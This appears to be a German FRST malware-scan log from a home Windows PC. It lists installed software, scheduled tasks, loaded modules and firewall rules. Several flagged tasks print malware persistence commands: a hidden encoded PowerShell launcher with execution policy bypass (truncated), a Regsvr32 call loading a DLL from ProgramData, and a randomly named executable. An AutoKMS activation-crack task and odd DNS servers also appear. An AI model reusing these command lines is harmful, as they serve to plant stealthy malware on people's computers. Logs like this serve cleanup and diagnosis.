Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft)
Mozilla Firefox 53.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.2 (x86 de)) (Version: 53.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.2.6333 - Mozilla)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden
Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden
Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden
PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version:  - PDF24.org)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek)
Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Sacred 3 (HKLM-x32\...\Steam App 247950) (Version:  - Keen Games)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Hidden
Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version:  - Ubisoft)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft)
Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version:  - Relic Entertainment)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH)
WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe 
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe 
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe  <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEABCBF8-4763-43D1-883B-86C80CB16A79} - System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (Der Dateneintrag hat 9732 mehr Zeichen). <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl
2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe
2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2010-07-15 06:44 - 2010-07-15 06:44 - 00020032 _____ () C:\Program Files\Unlocker\UnlockerCOM.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 43195904 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 02457088 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\skypert.dll
2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files (x86)\Drakonia Configurator\hid.exe
2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui
2017-05-07 17:13 - 2017-05-21 20:55 - 00034448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll
2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll
2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll
2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll
2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll
2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll
2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll
2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2017-01-22 15:26 - 2017-01-04 15:28 - 01958912 _____ () C:\Users\Dino\AppData\Local\Discord\app-0.0.297\ffmpeg.dll
2017-01-22 15:26 - 2017-01-22 15:26 - 01082880 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_voice\discord_voice.node
2017-01-22 15:26 - 2017-01-22 15:26 - 03750400 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_voice\libdiscord.dll
2017-01-22 15:26 - 2017-01-22 15:26 - 00914432 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_utils\discord_utils.node
2017-01-22 15:26 - 2017-01-22 15:26 - 01127424 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_toaster\discord_toaster.node
2017-01-22 15:26 - 2017-01-04 15:28 - 02278912 _____ () C:\Users\Dino\AppData\Local\Discord\app-0.0.297\libglesv2.dll
2017-01-22 15:26 - 2017-01-04 15:28 - 00096768 _____ () C:\Users\Dino\AppData\Local\Discord\app-0.0.297\libegl.dll
2017-05-21 21:22 - 2017-05-21 21:22 - 00148992 _____ () \\?\C:\Users\Dino\AppData\Local\Temp\2F77.tmp.node
2017-01-22 15:26 - 2017-05-01 13:16 - 02658296 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_rpc\discord_rpc.node
2017-01-22 15:26 - 2017-05-01 13:16 - 02665976 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_contact_import\discord_contact_import.node

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\Users\Dino\Desktop\tdsskiller.exe:BDU [0]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2017-05-21 20:57 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
DNS Servers: 82.163.143.157 - 82.163.142.159
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{83AD83AC-5138-49A1-AFE6-642DD681957A}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{9F1EF34D-804D-4346-AA62-2A72FA0FBF6F}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{BDC0A943-FFD9-4C31-97CB-2F5C6223930F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{6208BE91-3EEB-4FD5-A9F6-AAF6B8B6DAD4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{BDBD0D1C-E183-400A-95C5-7EC28883BDC6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0EFBE9B-6683-4F5E-B370-26BC5FBB1834}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B390EB1F-B557-4043-8E63-554A25E1FFA8}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Ghost Recon Wildlands Beta\GRW.exe
FirewallRules: [{4CE2A673-3091-4652-A0F4-EC8E65F46CDC}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's The Division PTS\TheDivision.exe
FirewallRules: [{A8417FA2-B44F-4117-8D45-30BCFD8686E6}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [{100496F8-41F8-47A3-85DD-5D420F581AEB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [UDP Query User{2E4F3652-EFD6-4881-9213-8EA61F89A46F}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [TCP Query User{88C41D9B-BB60-4F64-BC68-6DAB1AF7FB31}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [UDP Query User{47CE1527-A9E5-4FA6-8A51-6B1E508DD7AC}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [TCP Query User{13A38046-9894-492B-9138-E3CF3B213870}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [{99E199FA-1006-4A25-8A08-E28651356CDF}] => (Allow) D:\Programme\Ubisoft\Anno 2205\Bin\Win64\Anno2205.exe
FirewallRules: [{F3A38691-4442-4EAC-B3E6-B9767F22C203}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [{A15E195A-CCA8-4C1D-84C5-546BF8AAE637}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [TCP Query User{A6300EE9-EEE9-43B8-B529-D238E94D113B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{35161E84-F39F-429F-8D6F-A6CFC8EC13DF}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{9CE73BB9-D886-4EA9-9EDD-54D04E01DB68}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{C60179E6-4096-438F-A0AE-D7E540CE18C9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A5BC860D-355B-4935-99F7-09C0A701AAAA}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{62A800D2-8909-45FC-BFD5-612EF096C6F1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{24A88AFE-6316-461C-984E-4AF8F05FCC96}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{FF456D46-8990-4A73-82F7-4A5484372E42}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{CCDDE9C4-05CA-48D1-90C8-2D615BC7B643}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{607A7BED-54D2-4F98-B9A6-4F5D91E07585}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{DBABDDB1-A8F5-4509-A5A6-1A9F0EF2F69D}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{66B9313C-1DF5-470C-B1BD-9064863CA77A}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{38C3B3D0-D3E0-4BB2-8D00-595270146FE7}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{71C075D1-31A5-4E48-B456-75C0CC247DA6}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{859B27CC-891C-45EC-8310-BCCAAC722A85}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [{FC73742C-58EE-43B8-B2E2-0755BDB79FAB}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [TCP Query User{D780C36A-DADD-4902-950C-1B44C2B4591C}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{6BF43327-BDB7-4AB4-898E-8A25BE985091}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{3F0F651B-1103-4AE2-9098-9BCC4F26404D}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [{203174F0-92DD-4D57-B97E-47C4CAC797B9}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [TCP Query User{DAB2A3D3-0749-4FBF-BA46-7878A1B608DF}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [UDP Query User{2538DCE0-9E21-47AC-8348-A452790F29F9}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [{51A9B374-5A57-46AB-A962-C889763A43AD}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{67DCCF13-0AEA-4A47-8084-823442F272BB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{300F8BBD-78E2-41E0-8EC4-16DF8E59E651}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
